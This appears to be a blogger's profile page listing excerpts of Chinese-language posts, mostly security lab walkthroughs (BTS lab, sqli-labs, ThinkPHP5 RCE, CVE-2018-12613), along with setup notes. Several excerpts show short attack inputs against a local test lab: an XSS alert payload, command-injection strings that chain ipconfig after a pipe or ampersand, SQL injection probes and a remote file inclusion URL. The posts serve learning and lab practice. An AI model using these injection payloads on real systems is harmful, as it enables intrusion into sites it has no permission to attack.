4 wkend

尚未进行身份认证

菜鸟小白,希望在这里结交朋友,增长知识技能。

等级
TA的排名 3w+

python pip 安装库权限问题解决记录

问题详情:解决方法:python3 -m pip install click --user

2020-04-28 15:31:16

IDEA 2019.3 配置jdbc连接驱动

0x01 测试环境windows 10 64bitMySQL 8.0IDEA 2019.3mysql-connector-java-8.0.180x02 下载连接器访问MySQL官网https://www.mysql.com/,点击download,如下:依次点击,进入下面页面,点击Connector/J项选择操作系统为Platform Independent,ZIP文...

2019-12-13 19:18:04

python2、python3共存以及pip升级、安装依赖问题记录

0x01 测试环境windows 10python 38python 270x02 配置过程2.1 重命名下载,安装完成如下:进入Python27目录,建立python.exe副本,并重命名,结果如下图:同理,python38也一样,如下图:2.2 添加环境变量2.3 验证成功安装0x03 pip升级、安装依赖问题3.1 pip版本升级问题python[2...

2019-11-12 14:17:38

Mysql数据库渗透及漏洞利用总结

Mysql数据库渗透及漏洞利用总结Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前很多架构都以Mysql作为数据库管理系统,例如LAMP、和WAMP等,在针对网站渗透中,很多都是跟Mysql数据库有关,各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总...

2019-04-18 15:17:23

ThinkPHP5远程命令执行漏洞

0x01 ThinkPHP简介ThinkPHP是一个基于MVC和面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布。从诞生以来一直秉承简洁实用的设计原则,在保持出色的性能和至简的代码的同时,注重开发体验和易用性,为web应用开发提供了强有力的支持。0x02 漏洞简介(1)漏洞名称ThinkPHP5远程命令执行(2)漏洞描述由于ThinkPHP5框架对控制器名没有进行足够的安...

2019-01-02 10:24:40

CVE-2018-12613 --- 本地文件包含造成远程代码执行漏洞复现

0x01 了解本地文件包含LFI(本地文件包含),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。0x02 了解远程代码执行RCE(远程代码执行),远程...

2018-12-26 16:40:59

cookie注入

0x00 什么是cookie?cookie是当前识别用户,实现持久会话的最好的方式,有时也叫cookies,指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据(通常经过加密)。cookie最初是由网景公司开发的,现在所有的浏览器都支持。“Cookie”是小量信息,由网络服务器发送出来以存储在网络浏览器上,从而下次这位独一无二的访客又回到该网络服务器时,可从该浏览...

2018-11-08 13:13:08

BTS测试实验室 --- 文件包含、SSRF、点击劫持、无限制文件上传

0X00 文件包含1. 什么是“文件包含”?在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。文件包含分为本地文件包含和远程文件包含。2. 本地文件包含利用方式btslab只有本地文件包含,所以这里只演示本地文件包含的利用方式。注意这里的url包含了一个文件news.php我们在本地创建一个新的文件...

2018-11-03 16:49:03

BTS测试实验室 --- CSRF

0x00 什么是“CSRF”?以下介绍来自OWASP20130x01 “CSRF”的发现与防止0x02 攻击案例0x03 CSRF 1 — 更改信息以普通用户身份登入(这里我选择tom),进入修改个人信息修改页输入新信息,抓包得到修改页的请求url,注意这里的请求方式是GET接下来构造CSRF攻击,构造攻击页面,接下来已经登录的tom去访问攻击者构造的网站这时候t...

2018-11-03 10:58:00

BTS测试实验室 --- 安全配置错误和丢失的功能级别访问控制

什么是“安全配置错误”漏洞

2018-11-02 23:32:05

BTS测试实验室 ---不安全的直接对象引用

0x00 什么是“不安全的直接对象引用”?浏览OWASP对该漏洞的说明下面是2013年OWASP对不安全的直接对象引用的说明:0x01 回到题目查看详细信息首先用普通用户登入,如tom用户查看tom用户的详细信息:注意url中的参数idhttp://127.0.0.1/btslab/myprofile.php?id=4改变该参数值,如http://127.0.0....

2018-11-02 21:58:04

BTS测试实验室 --- xss攻略

ox00反射型挑战1payload:<script>alert('xss')</script>挑战2通过尝试发现页面会发生变化,而且参数在url中可见且可控url:http://127.0.0.1/btslab/vulnerability/xss/xss2.php?clr=%23000&Change=%E5%88%87%E6%8D%A2改变参数

2018-11-02 21:02:43

BTS测试实验室--远程文件包含和服务器端注入攻略

远程文件包含构造payload:http://127.0.0.1/btslab/vulnerability/rfi/RFI.php?file=http://192.168.1.129/test2/demo1.php可以看到,远程包含的文件被解析执行了。下面来看看远程文件中的内容是什么?所以说,对于存在远程文件包含漏洞的情况,会造成任意代码被执行的危害。有关这个漏洞更多的实例或讲解,可...

2018-10-28 22:34:59

centos 7+nginx无法访问php页面的问题记录

在这里做一下问题记录帖:问题截图:这里我的配置环境是:centos 7.5nginx 1.14.0php 7.2.10OK,下面说说解决办法:找到php-fpm执行文件,我的在目录/usr/local/php/sbin/下find / -name php-fpm进入到该目录下cd /usr/local/php/sbin/可以看到可执行文件php-fpm然后执行命令:...

2018-10-28 20:51:17

BTS测试实验室 --- 注入关 --- PHP对象注入

0x01 挑战1提到对象注入,首先就要了解对象的序列化与反序列化,所以对象注入漏洞也有人称作反序列化漏洞。有关序列化与反序列的内容,在这里做简单说明。序列化的参数类型表示说明String s:size:valueInteger i:valueBoolean b:valueNull NArray a:size:{key define;value define}Object ...

2018-10-28 15:20:24

BTS测试实验室 --- 注入关攻略

0x00 命令注入payload:127.0.0.1 | ipconfig13||ipconfig127.0.0.1&ipconfig127.0.0.1&&ipconfig上面的方式主要是通过管道符让系统执行了命令。‘以下是常用的管道符:0x01 windows系列支持的管道符| 直接执行后面的语句|| 如果前面执行的语句出错,则执行后面的语句,前面的语...

2018-10-28 10:05:59

BTS测试实验室 --- SQL注入关攻略

一. Sql注入1判断注入点:http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1’如下图,报错,存在sql注入手工注入,(1)爆字段数:http://127.0.0.1/btslab/vulnerability/ForumPosts.php?id=1 order by 4,页面返回正常http://127.0.0.1/b...

2018-10-25 23:19:21

XSS小结

XSS是什么?XSS全称跨站脚本(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。跨站点脚本(XSS)攻击是一种注射型攻击,攻击者在可信的网页中嵌入恶意代码,用户访问可信网页时触发XSS而被攻击。XSS会造成那些危害?攻击者通过Web应用程序发送恶意代码,一般以浏览器脚本的形式发送给不同的终端用...

2018-10-19 21:20:26

sqli-labs练习(十八、十九、二十、二十一)

按照正常思路,先是对username和password输入框进行测试,并没有找到注入点,页面上显示的ip地址也很奇怪,最会无奈查看了源代码,才发现了突破口。发现后台对uname和passwd有检查过滤函数check_input于是跟进check_input函数,发现对输入的参数进行了长度限制,纯数字过滤,特殊符号过滤到现在我们就可以看出,在uname和passwd出已经无法入手,,,,...

2018-10-14 00:05:39

端口扫描

0x01 端口扫描介绍端口扫描是指人为发送一组端口扫描消息,视图以此了解某台计算机的弱点,并了解其提供的计算机网络服务类型。端口最常用也是最强大的工具是nmap,在nmap的端口扫描方式中,所有的扫描方式都是以-s[x]的形式,若是ACK扫描则是-sA,若是UDP扫描则是-sU。0x02 端口状态nmap提供了6个端口状态,帮助我们了解目标。open此端口对外为开放状态closed...

2018-10-13 19:00:27

查看更多

勋章 我的勋章
  • GitHub
    GitHub
    绑定GitHub第三方账户获取
  • 持之以恒
    持之以恒
    授予每个自然月内发布4篇或4篇以上原创或翻译IT博文的用户。不积跬步无以至千里,不积小流无以成江海,程序人生的精彩需要坚持不懈地积累!
  • 勤写标兵Lv1
    勤写标兵Lv1
    授予每个自然周发布1篇到3篇原创IT博文的用户。本勋章将于次周周三上午根据用户上周的博文发布情况由系统自动颁发。